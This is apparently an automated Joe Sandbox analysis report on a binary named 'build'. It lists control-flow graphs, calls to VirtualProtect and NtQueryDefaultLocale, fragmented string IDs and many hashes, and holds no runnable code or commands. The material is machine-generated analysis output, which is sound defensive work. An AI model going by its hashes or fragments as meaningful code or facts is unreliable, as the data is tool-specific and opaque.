41fccf 3 API calls 5081->5083 5084 41fcc6 5083->5084 5084->5082 5088 41fd36 5085->5088 5092 41fd45 5085->5092 5086 420093 ExitProcess 5088->5086 5090 420192 5088->5090 5089 420298 5143 4202b2 5089->5143 5090->5089 5137 42022a 5090->5137 5092->5088 5126 41ffb3 5092->5126 5097 41fb2f 5096->5097 5100 41fb23 5096->5100 5107 41fb40 5097->5107 5099 41fbd9 5102 41fcb2 4 API calls 5099->5102 5100->5099 5101 41fbe1 5 API calls 5100->5101 5101->5099 5103 41fcab 5102->5103 5104 41fccf 3 API calls 5103->5104 5105 41fcc6 ExitProcess 5104->5105 5117 41fb51 5107->5117 5118 41fb88 5117->5118 5119 41fbd9 5118->5119 5120 41fbe1 5 API calls 5118->5120 5121 41fcb2 4 API calls 5119->5121 5120->5119 5122 41fcab 5121->5122 5123 41fccf 3 API calls 5122->5123 5124 41fcc6 ExitProcess 5123->5124 5130 41fdad 5126->5130 5127 420093 ExitProcess 5129 41ff59 5129->5127 5133 420192 5129->5133 5130->5129 5131 41ffb3 ExitProcess 5130->5131 5131->5130 5132 420298 5134 4202b2 ExitProcess 5132->5134 5133->5132 5135 42022a ExitProcess 5133->5135 5136 4202a9 5134->5136 5135->5133 5138 4201de 5137->5138 5138->5137 5139 420298 5138->5139 5142 42022a ExitProcess 5138->5142 5140 4202b2 ExitProcess 5139->5140 5141 4202a9 5140->5141 5142->5138 5144 4202d0 ExitProcess 5143->5144 5305 41715a 5307 4173cc 5305->5307 5306 41776c NtQueryDefaultLocale 5308 417783 5306->5308 5307->5306 5243 40763f 5244 407587 5243->5244 5246 40769b 5244->5246 5249 4076bb 5244->5249 5247 40776f VirtualProtect 5246->5247 5248 4077a9 5247->5248 5250 407700 5249->5250 5251 40776f VirtualProtect 5250->5251 5252 4077a9 5251->5252

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 0 41caba-41cb80 2 41cb91-41cbdc 0->2 3 41cb82-41cb8c 0->3 10 41cbed-41cbf3 2->10 11 41cbde-41cbe8 2->11 4 41ce4d-41ce86 3->4 8 41cec9-41cf27 4->8 9 41ce88-41cec4 4->9 18 41cf29-41cf35 8->18 19 41cf3a-41cf4f 8->19 15 41da06-41f370 VirtualProtect call 41da41 call 41f371 9->15 14 41cbf9-41cc51 10->14 11->4 17 41cc58-41cd1f call 41cd00 14->17 33 41cd21-41cd37 17->33 34 41cd39-41cd49 17->34 22 41d22b-41d232 18->22 23 41cf51-41cf5d 19->23 24 41cf62-41cf81 19->24 28 41d306-41da00 call 41d316 call 41d32c call 41d37c call 41d676 call 41d6d5 22->28 29 41d238-41d252 call 41d257 22->29 23->22 30 41cf83-41cf8f 24->30 31 41cf94-41cfa6 24->31 28->15 29->28 30->22 37 41cfb9-41d022 31->37 38 41cfa8-41cfb4 31->38 41 41cd9c-41cda3 33->41 34->17 42 41cd4f-41cd62 34->42 51 41d028-41d072 37->51 52 41d21f-41d225 37->52 38->22 48 41cde5-41ce31 41->48 49 41cda5-41cde3 41->49 42->17 47 41cd68-41cd78 42->47 54 41cd86 47->54 55 41cd7a-41cd84 47->55 58 41ce43 48->58 59 41ce33-41ce3d 48->59 49->4 60 41d083-41d094 51->60 52->22 64 41cd90-41cd96 54->64 55->64 58->4 59->14 59->58 61 41d135-41d186 60->61 62 41d09a-41d0aa 60->62 77 41d194-41d1eb call 41d1b8 61->77 78 41d188-41d192 61->78 62->61 66 41d0b0-41d101 62->66 64->41 70 41d103-41d125 66->70 71 41d127 66->71 70->71 75 41d12e 70->75 71->60 75->61 92 41d1f9 77->92 93 41d1ed-41d1f7 77->93 81 41d203-41d20a 78->81 84 41d21a 81->84 85 41d20c-41d218 81->85 84->22 85->22 92->81 93->81
                      APIs
                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0041DA1D
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_build.jbxd
                      Yara matches
                      Similarity
                      • API ID: ProtectVirtual
                      • String ID: E$L$L$P$W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                      • API String ID: 544645111-215400123
                      • Opcode ID: 25ceb620cde84b9a6f9aae2053d098413eef51a21165765ed1d1780b96466641
                      • Instruction ID: 96e07906f0b69665a99d788711513d70affac305f80943359574ecec95edf81e
                      • Opcode Fuzzy Hash: 25ceb620cde84b9a6f9aae2053d098413eef51a21165765ed1d1780b96466641
                      • Instruction Fuzzy Hash: 85C108B1C082689EF720CA24DC84BEABB74EB91304F1481FAD84D56681D77D5FC59F62

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 100 41cd00-41cd1f 101 41cd21-41cd37 100->101 102 41cd39-41cd49 100->102 103 41cd9c-41cda3 101->103 104 41cc58-41ccfe call 41cd00 102->104 105 41cd4f-41cd62 102->105 107 41cde5-41ce31 103->107 108 41cda5-41cde3 103->108 104->100 105->104 106 41cd68-41cd78 105->106 110 41cd86 106->110 111 41cd7a-41cd84 106->111 113 41ce43 107->113 114 41ce33-41ce3d 107->114 117 41ce4d-41ce86 108->117 116 41cd90-41cd96 110->116 111->116 113->117 114->113 118 41cbf9-41cc51 114->118 116->103 120 41cec9-41cf27 117->120 121 41ce88-41cec4 117->121 118->104 126 41cf29-41cf35 120->126 127 41cf3a-41cf4f 120->127 124 41da06-41f370 VirtualProtect call 41da41 call 41f371 121->124 129 41d22b-41d232 126->129 130 41cf51-41cf5d 127->130 131 41cf62-41cf81 127->131 133 41d306-41da00 call 41d316 call 41d32c call 41d37c call 41d676 call 41d6d5 129->133 134 41d238-41d252 call 41d257 129->134 130->129 135 41cf83-41cf8f 131->135 136 41cf94-41cfa6 131->136 133->124 134->133 135->129 140 41cfb9-41d022 136->140 141 41cfa8-41cfb4 136->141 149 41d028-41d072 140->149 150 41d21f-41d225 140->150 141->129 153 41d083-41d094 149->153 150->129 154 41d135-41d186 153->154 155 41d09a-41d0aa 153->155 169 41d194-41d1eb call 41d1b8 154->169 170 41d188-41d192 154->170 155->154 158 41d0b0-41d101 155->158 162 41d103-41d125 158->162 163 41d127 158->163 162->163 167 41d12e 162->167 163->153 167->154 184 41d1f9 169->184 185 41d1ed-41d1f7 169->185 173 41d203-41d20a 170->173 176 41d21a 173->176 177 41d20c-41d218 173->177 176->129 177->129 184->173 185->173
                      APIs
                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0041DA1D
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_build.jbxd
                      Yara matches
                      Similarity
                      • API ID: ProtectVirtual
                      • String ID: E$P$S$W$_S$c$e$i$o$r$s$s$t$x
                      • API String ID: 544645111-3000879820
                      • Opcode ID: a571f0c90d2804b6c4b6a94c3c8824fd73f5f93a1ceecb7862db087940158e4a
                      • Instruction ID: 884b98e7c8a569db0c5dd9b21bdebe68354a6858b6c49b710d0825530fee468d
                      • Opcode Fuzzy Hash: a571f0c90d2804b6c4b6a94c3c8824fd73f5f93a1ceecb7862db087940158e4a
                      • Instruction Fuzzy Hash: 0632B0B1D046689BEB24CB14DC90BEABBB5EB85304F1481FAD80D66381D7399EC2CF55

                      Control-flow Graph

                      APIs
                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0041DA1D
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_build.jbxd
                      Yara matches
                      Similarity
                      • API ID: ProtectVirtual
                      • String ID: E$P$S$W$_S$c$e$i$o$r$s$s$t$x
                      • API String ID: 544645111-3000879820
                      • Opcode ID: 4c95bf7e24adb1db337edbd5686769632907e5f9b1fa7965824d33e121b4d76c
                      • Instruction ID: d158561e8fbb367ccf9def83134a1f9f02d01e5a30f4799e541c6d94b93b0aa4
                      • Opcode Fuzzy Hash: 4c95bf7e24adb1db337edbd5686769632907e5f9b1fa7965824d33e121b4d76c
                      • Instruction Fuzzy Hash: 5381FBF1D086689FE7208A64DC44BEA7BB4EB81314F1480FBD84D56241D77D9EC68B92

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 230 4166e1-416704 232 416716-416759 230->232 233 416706-416710 230->233 236 41706c-4170ff 232->236 237 41675f-4168b8 call 4168bb 232->237 233->232 234 4164cc-4165cf call 41653f call 4165d0 233->234 245 417101-41710b 236->245 246 417110-417132 call 417134 236->246 249 4173cc-41745c 245->249 246->249 261 41746f-417484 249->261 262 41745e-41746a 249->262 263 417497-4174b6 261->263 264 417486-417492 261->264 265 417760-41777d NtQueryDefaultLocale 262->265 266 4174c9-4174db 263->266 267 4174b8-4174c4 263->267 264->265 269 417783-417797 call 417793 265->269 270 417976-4179ed call 4179be call 4179df 265->270 271 4174dd-4174e9 266->271 272 4174ee-417557 266->272 267->265 288 4179fe-417a24 270->288 271->265 277 417754-41775a 272->277 278 41755d-4175a7 272->278 277->265 281 4175b8-4175c9 278->281 283 41766a-41774d 281->283 284 4175cf-4175df 281->284 283->265 284->283 286 4175e5-417636 call 4175f9 284->286 296 417638-41765a 286->296 297 41765c 286->297 294 417a31 288->294 295 417a26-417b0d call 417a72 288->295 294->288 296->297 299 417663 296->299 297->281 299->283
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_build.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                      • API String ID: 0-4069139063
                      • Opcode ID: fccae9870a50f8b9b5593d71dbc725d2ea5299f91a12f9e0e39864fbe1a573b9
                      • Instruction ID: 4058cbc92310f8f4e43dd3c396a785fb687be82286c4d2893251167a3ad01c49
                      • Opcode Fuzzy Hash: fccae9870a50f8b9b5593d71dbc725d2ea5299f91a12f9e0e39864fbe1a573b9
                      • Instruction Fuzzy Hash: 7BC1CEB1D182688EE724CB24DC50BEAB7B6EF54310F0480EAD44DA7282D6799EC5CF56

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 406 417331-41745c call 417344 413 41746f-417484 406->413 414 41745e-41746a 406->414 415 417497-4174b6 413->415 416 417486-417492 413->416 417 417760-41777d NtQueryDefaultLocale 414->417 418 4174c9-4174db 415->418 419 4174b8-4174c4 415->419 416->417 421 417783-417797 call 417793 417->421 422 417976-4179ed call 4179be call 4179df 417->422 423 4174dd-4174e9 418->423 424 4174ee-417557 418->424 419->417 440 4179fe-417a24 422->440 423->417 429 417754-41775a 424->429 430 41755d-4175a7 424->430 429->417 433 4175b8-4175c9 430->433 435 41766a-41774d 433->435 436 4175cf-4175df 433->436 435->417 436->435 438 4175e5-417636 call 4175f9 436->438 448 417638-41765a 438->448 449 41765c 438->449 446 417a31 440->446 447 417a26-417b0d call 417a72 440->447 446->440 448->449 451 417663 448->451 449->433 451->435
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_build.jbxd
                      Yara matches
                      Similarity
                      • API ID: DefaultLocaleQuery
                      • String ID: K7N:$PLDE
                      • API String ID: 2949231068-2424058915
                      • Opcode ID: 4ebc055a304ce616f70e28154787af76ea51a2690bc9e884b9a633f01ff7cea9
                      • Instruction ID: ffd5ec5ae0d17dccbe4aed31b7c5ac12f54083616d1aa68df9d8a4f299ec2e9b
                      • Opcode Fuzzy Hash: 4ebc055a304ce616f70e28154787af76ea51a2690bc9e884b9a633f01ff7cea9
                      • Instruction Fuzzy Hash: E321C5B2D146288FE729DE10DC61BEA7B78EB94710F1444FED40D96382D238AEC68F41
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_build.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: I@6H
                      • API String ID: 0-1188634044
                      • Opcode ID: 2d4f9f24aacaf92025cb5df011a3a4628350eab865d05d77a70edf09542be95a
                      • Instruction ID: 5920d79fff2bea0940e57e1bcf8417fa33f96c24497b0643d90e568a438fae86
                      • Opcode Fuzzy Hash: 2d4f9f24aacaf92025cb5df011a3a4628350eab865d05d77a70edf09542be95a
                      • Instruction Fuzzy Hash: 87028BB1D046288FEB24CB14DC90BEABBB5EB44314F1581EAD84DA6341D778AEC1CF95

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 460 4070f4-40743a 462 40743c-407448 460->462 463 40744d-407462 460->463 464 40773e-4077e0 call 40775d VirtualProtect call 4077d7 462->464 465 407464-407470 463->465 466 407475-407494 463->466 503 4077e6 464->503 465->464 468 407496-4074a2 466->468 469 4074a7-4074b9 466->469 468->464 471 4074bb-4074c7 469->471 472 4074cc-407535 469->472 471->464 475 407732-407738 472->475 476 40753b-407585 472->476 475->464 478 407596-4075a7 476->478 480 407648-407673 478->480 481 4075ad-4075bd 478->481 484 407678-407699 480->484 481->480 483 4075c3-407614 481->483 486 407616-407638 483->486 487 40763a 483->487 488 4076a7-4076bf call 4076bb 484->488 489 40769b-4076a5 484->489 486->487 491 407641 486->491 487->478 488->484 500 4076c1-4076fe 488->500 493 407716-40771d 489->493 491->480 496 40772d 493->496 497 40771f-40772b 493->497 496->464 497->464 501 407700-40770a 500->501 502 40770c 500->502 501->493 502->493 503->503
                      APIs
                      • VirtualProtect.KERNELBASE(?,?,00000040,FFFFEBA4,?,?,?,?,?,?,?,?,00406A5A,?), ref: 0040779F
                      Memory Dump Source
                      • Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_build.jbxd
                      Yara matches
                      Similarity
                      • API ID: ProtectVirtual
                      • String ID:
                      • API String ID: 544645111-0
                      • Opcode ID: 1873d2e98772a56a1f3f50abdc1a30725eabaefc76c8d9e6bd4245df3509a6a5
                      • Instruction ID: 7044fe5ad64ec624e05532b87b8b60acdd503ca618109fa90a8a530f8245d850
                      • Opcode Fuzzy Hash: 1873d2e98772a56a1f3f50abdc1a30725eabaefc76c8d9e6bd4245df3509a6a5
                      • Instruction Fuzzy Hash: 83B16CB1E096688FEB24CB14CD90AEAB7B5FF95314F1441FAD40D67281D6386E82CF46

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 604 41715a-41745c 608 41746f-417484 604->608 609 41745e-41746a 604->609 610 417497-4174b6 608->610 611 417486-417492 608->611 612 417760-41777d NtQueryDefaultLocale 609->612 613 4174c9-4174db 610->613 614 4174b8-4174c4 610->614 611->612 616 417783-417797 call 417793 612->616 617 417976-4179ed call 4179be call 4179df 612->617 618 4174dd-4174e9 613->618 619 4174ee-417557 613->619 614->612 635 4179fe-417a24 617->635 618->612 624 417754-41775a 619->624 625 41755d-4175a7 619->625 624->612 628 4175b8-4175c9 625->628 630 41766a-41774d 628->630 631 4175cf-4175df 628->631 630->612 631->630 633 4175e5-417636 call 4175f9 631->633 643 417638-41765a 633->643 644 41765c 633->644 641 417a31 635->641 642 417a26-417b0d call 417a72 635->642 641->635 643->644 646 417663 643->646 644->628 646->630
                      APIs
                      • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417775
                      Memory Dump Source
                      • Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_build.jbxd
                      Yara matches
                      Similarity
                      • API ID: DefaultLocaleQuery
                      • String ID:
                      • API String ID: 2949231068-0
                      • Opcode ID: 9e16f5c70233000f8796cb9847f4fe9ff4f8a1996f646a2b5f2b0288281738fc
                      • Instruction ID: 1476018a360be73aa8c090b949e9f603223c4eaf32c2674842341c04bba03150
                      • Opcode Fuzzy Hash: 9e16f5c70233000f8796cb9847f4fe9ff4f8a1996f646a2b5f2b0288281738fc
                      • Instruction Fuzzy Hash: 119128B5D056298FEB25CB14CC90BEABBB5BB84305F2481EAD40DA7785D6389EC1CF44

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 655 417194-4171d0 656 4171d7-41729e 655->656 657 4172a0-4172b6 656->657 658 4172b8-4172c8 656->658 659 41731b-417322 657->659 658->656 660 4172ce-4172e1 658->660 661 417364-4173b0 call 417392 659->661 662 417324-417330 call 417331 659->662 660->656 663 4172e7-4172f7 660->663 671 4173c2 661->671 672 4173b2-4173bc 661->672 673 4173cc-41745c 662->673 665 417305 663->665 666 4172f9-417303 663->666 669 41730f-417315 665->669 666->669 669->659 671->673 672->671 674 417178-4171d0 call 417194 672->674 679 41746f-417484 673->679 680 41745e-41746a 673->680 674->656 681 417497-4174b6 679->681 682 417486-417492 679->682 683 417760-41777d NtQueryDefaultLocale 680->683 684 4174c9-4174db 681->684 685 4174b8-4174c4 681->685 682->683 687 417783-417797 call 417793 683->687 688 417976-4179ed call 4179be call 4179df 683->688 689 4174dd-4174e9 684->689 690 4174ee-417557 684->690 685->683 706 4179fe-417a24 688->706 689->683 695 417754-41775a 690->695 696 41755d-4175a7 690->696 695->683 699 4175b8-4175c9 696->699 701 41766a-41774d 699->701 702 4175cf-4175df 699->702 701->683 702->701 704 4175e5-417636 call 4175f9 702->704 714 417638-41765a 704->714 715 41765c 704->715 712 417a31 706->712 713 417a26-417b0d call 417a72 706->713 712->706 714->715 717 417663 714->717 715->699 717->701
                      Memory Dump Source
                      • Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_build.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: efe9d461559758ed977dfa37ac5472bf23fbfded5532083aac7100f3e76e22da
                      • Instruction ID: 1592a4de669d177e619d21ec268e8ac6f2e4ea726e5cb4f96c08e6849bc92a70
                      • Opcode Fuzzy Hash: efe9d461559758ed977dfa37ac5472bf23fbfded5532083aac7100f3e76e22da
                      • Instruction Fuzzy Hash: 97617CB1D142298AEB288B15CC90BFAB775FF44314F1085FAE809A6681E7785EC1CF55

                      Control-flow Graph

                      • Executed
                      • Not Executed
